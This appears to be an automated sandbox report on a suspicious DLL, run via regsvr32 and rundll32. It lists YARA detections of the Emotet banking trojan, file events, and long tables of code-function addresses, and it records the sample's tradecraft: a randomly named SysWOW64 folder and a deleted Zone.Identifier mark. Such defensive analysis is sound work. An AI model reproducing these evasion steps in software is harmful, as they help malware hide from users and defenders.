Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000FF59 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		3_2_1000FF59

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.48d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e50000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5140000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.49c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5140000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.49f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4a20000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5110000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.52a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.49f0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4760000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5170000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4a50000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.50e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4a20000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.49c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4b80000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4b30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.50e0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4b80000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4730000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4860000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4860000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4890000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.52a0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.4bb0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2f90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4e80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.52d0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.651219135.0000000003250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658773887.00000000052D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.663246683.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658783740.0000000004A51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658642834.00000000050E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658723299.0000000005171000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.657974448.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.655430157.0000000002940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658619486.0000000004860000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658016233.00000000008E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658517019.0000000004E81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658811817.0000000004B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658095730.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658757089.0000000004A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.655623941.0000000004241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658582876.0000000004FB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658656384.0000000004891000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658747642.00000000052A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658668655.0000000005111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658839063.0000000004BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658706042.00000000049C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658328602.00000000048D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658574169.0000000004761000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.663415496.00000000049F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658548495.0000000004730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658494027.0000000004E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.658732893.00000000049F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658556614.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.658697305.0000000005140000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Source: EcJ8rbg.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Twpdaikokj\mcaqvcjuoohw.tdj:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Twpdaikokj\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10020011	2_2_10020011
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100181CA	2_2_100181CA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001929D	2_2_1001929D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002542D	2_2_1002542D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100274AE	2_2_100274AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10026575	2_2_10026575
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001869D	2_2_1001869D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001178A	2_2_1001178A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10016860	2_2_10016860
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002596F	2_2_1002596F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10022A5C	2_2_10022A5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10018A71	2_2_10018A71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001AAB7	2_2_1001AAB7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001CB16	2_2_1001CB16
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10018E7D	2_2_10018E7D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10025EB1	2_2_10025EB1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B485FF	2_2_04B485FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4EFDD	2_2_04B4EFDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B31CA1	2_2_04B31CA1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4E4E5	2_2_04B4E4E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4CCD9	2_2_04B4CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B33431	2_2_04B33431
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4A474	2_2_04B4A474
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4DC71	2_2_04B4DC71
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B37442	2_2_04B37442
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3A445	2_2_04B3A445
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B43D85	2_2_04B43D85
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B49DF5	2_2_04B49DF5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B355FF	2_2_04B355FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4C5D5	2_2_04B4C5D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3C5D8	2_2_04B3C5D8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B48D3D	2_2_04B48D3D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B45515	2_2_04B45515
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4AD08	2_2_04B4AD08
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B52D53	2_2_04B52D53
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B47D5B	2_2_04B47D5B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4654A	2_2_04B4654A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B40EBC	2_2_04B40EBC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B546BD	2_2_04B546BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3C6B8	2_2_04B3C6B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B43EAA	2_2_04B43EAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B536AA	2_2_04B536AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4BEFD	2_2_04B4BEFD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B53EE9	2_2_04B53EE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B38636	2_2_04B38636
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3DE74	2_2_04B3DE74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B37E79	2_2_04B37E79
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4567B	2_2_04B4567B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B42E5D	2_2_04B42E5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3E640	2_2_04B3E640
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B517BD	2_2_04B517BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B357B8	2_2_04B357B8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3BFBE	2_2_04B3BFBE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B377A3	2_2_04B377A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B48FAE	2_2_04B48FAE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B507AA	2_2_04B507AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B40F86	2_2_04B40F86
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B407F4	2_2_04B407F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B427F9	2_2_04B427F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B467E6	2_2_04B467E6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3E7DE	2_2_04B3E7DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B31F38	2_2_04B31F38
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3670B	2_2_04B3670B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3EF0C	2_2_04B3EF0C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B44F74	2_2_04B44F74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B49774	2_2_04B49774
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B45779	2_2_04B45779
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4FF58	2_2_04B4FF58
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3F0E9	2_2_04B3F0E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B500EF	2_2_04B500EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4D8DB	2_2_04B4D8DB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B380C0	2_2_04B380C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3B820	2_2_04B3B820
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B48806	2_2_04B48806
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B52009	2_2_04B52009
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3A871	2_2_04B3A871
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B37078	2_2_04B37078
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4F840	2_2_04B4F840
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4D1BC	2_2_04B4D1BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B32194	2_2_04B32194
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B46187	2_2_04B46187
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4E1F8	2_2_04B4E1F8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B4017B	2_2_04B4017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10020011	3_2_10020011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100181CA	3_2_100181CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001929D	3_2_1001929D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002542D	3_2_1002542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100274AE	3_2_100274AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10026575	3_2_10026575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001869D	3_2_1001869D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001178A	3_2_1001178A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10016860	3_2_10016860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002596F	3_2_1002596F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10022A5C	3_2_10022A5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10018A71	3_2_10018A71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001AAB7	3_2_1001AAB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001CB16	3_2_1001CB16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10018E7D	3_2_10018E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10025EB1	3_2_10025EB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042585FF	3_2_042585FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425EFDD	3_2_0425EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04243431	3_2_04243431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425A474	3_2_0425A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425DC71	3_2_0425DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424A445	3_2_0424A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04247442	3_2_04247442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04241CA1	3_2_04241CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425E4E5	3_2_0425E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425CCD9	3_2_0425CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04258D3D	3_2_04258D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425AD08	3_2_0425AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04255515	3_2_04255515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425654A	3_2_0425654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04262D53	3_2_04262D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04257D5B	3_2_04257D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04253D85	3_2_04253D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04259DF5	3_2_04259DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042455FF	3_2_042455FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425C5D5	3_2_0425C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424C5D8	3_2_0424C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04248636	3_2_04248636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424DE74	3_2_0424DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04247E79	3_2_04247E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425567B	3_2_0425567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424E640	3_2_0424E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04252E5D	3_2_04252E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042636AA	3_2_042636AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04253EAA	3_2_04253EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04250EBC	3_2_04250EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042646BD	3_2_042646BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424C6B8	3_2_0424C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04263EE9	3_2_04263EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425BEFD	3_2_0425BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04241F38	3_2_04241F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424EF0C	3_2_0424EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424670B	3_2_0424670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04254F74	3_2_04254F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04259774	3_2_04259774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04255779	3_2_04255779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425FF58	3_2_0425FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042477A3	3_2_042477A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04258FAE	3_2_04258FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042607AA	3_2_042607AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424BFBE	3_2_0424BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042617BD	3_2_042617BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042457B8	3_2_042457B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04250F86	3_2_04250F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042567E6	3_2_042567E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042507F4	3_2_042507F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042527F9	3_2_042527F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424E7DE	3_2_0424E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424B820	3_2_0424B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04258806	3_2_04258806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04262009	3_2_04262009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424A871	3_2_0424A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04247078	3_2_04247078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425F840	3_2_0425F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042600EF	3_2_042600EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424F0E9	3_2_0424F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_042480C0	3_2_042480C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425D8DB	3_2_0425D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425017B	3_2_0425017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04252142	3_2_04252142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424D14C	3_2_0424D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425E955	3_2_0425E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425D1BC	3_2_0425D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04256187	3_2_04256187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04242194	3_2_04242194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425E1F8	3_2_0425E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04259A01	3_2_04259A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04257A0F	3_2_04257A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04260A64	3_2_04260A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04254A66	3_2_04254A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04263263	3_2_04263263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04254244	3_2_04254244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425B257	3_2_0425B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425A2A5	3_2_0425A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424BAA9	3_2_0424BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04250ABA	3_2_04250ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425CAD5	3_2_0425CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04255333	3_2_04255333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04262B09	3_2_04262B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424F369	3_2_0424F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04246B7A	3_2_04246B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425437A	3_2_0425437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424238C	3_2_0424238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424FB8E	3_2_0424FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04244BFC	3_2_04244BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0425FBDE	3_2_0425FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E7A0F	5_2_048E7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F2009	5_2_048F2009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D8636	5_2_048D8636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DA445	5_2_048DA445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EB257	5_2_048EB257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E4A66	5_2_048E4A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DDE74	5_2_048DDE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F17BD	5_2_048F17BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EEFDD	5_2_048EEFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DC5D8	5_2_048DC5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E85FF	5_2_048E85FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D670B	5_2_048D670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EAD08	5_2_048EAD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E654A	5_2_048E654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E2142	5_2_048E2142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EFF58	5_2_048EFF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EE955	5_2_048EE955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E3EAA	5_2_048E3EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DBAA9	5_2_048DBAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F36AA	5_2_048F36AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EA2A5	5_2_048EA2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D1CA1	5_2_048D1CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F46BD	5_2_048F46BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E0EBC	5_2_048E0EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E0ABA	5_2_048E0ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DC6B8	5_2_048DC6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D80C0	5_2_048D80C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048ED8DB	5_2_048ED8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048ECCD9	5_2_048ECCD9
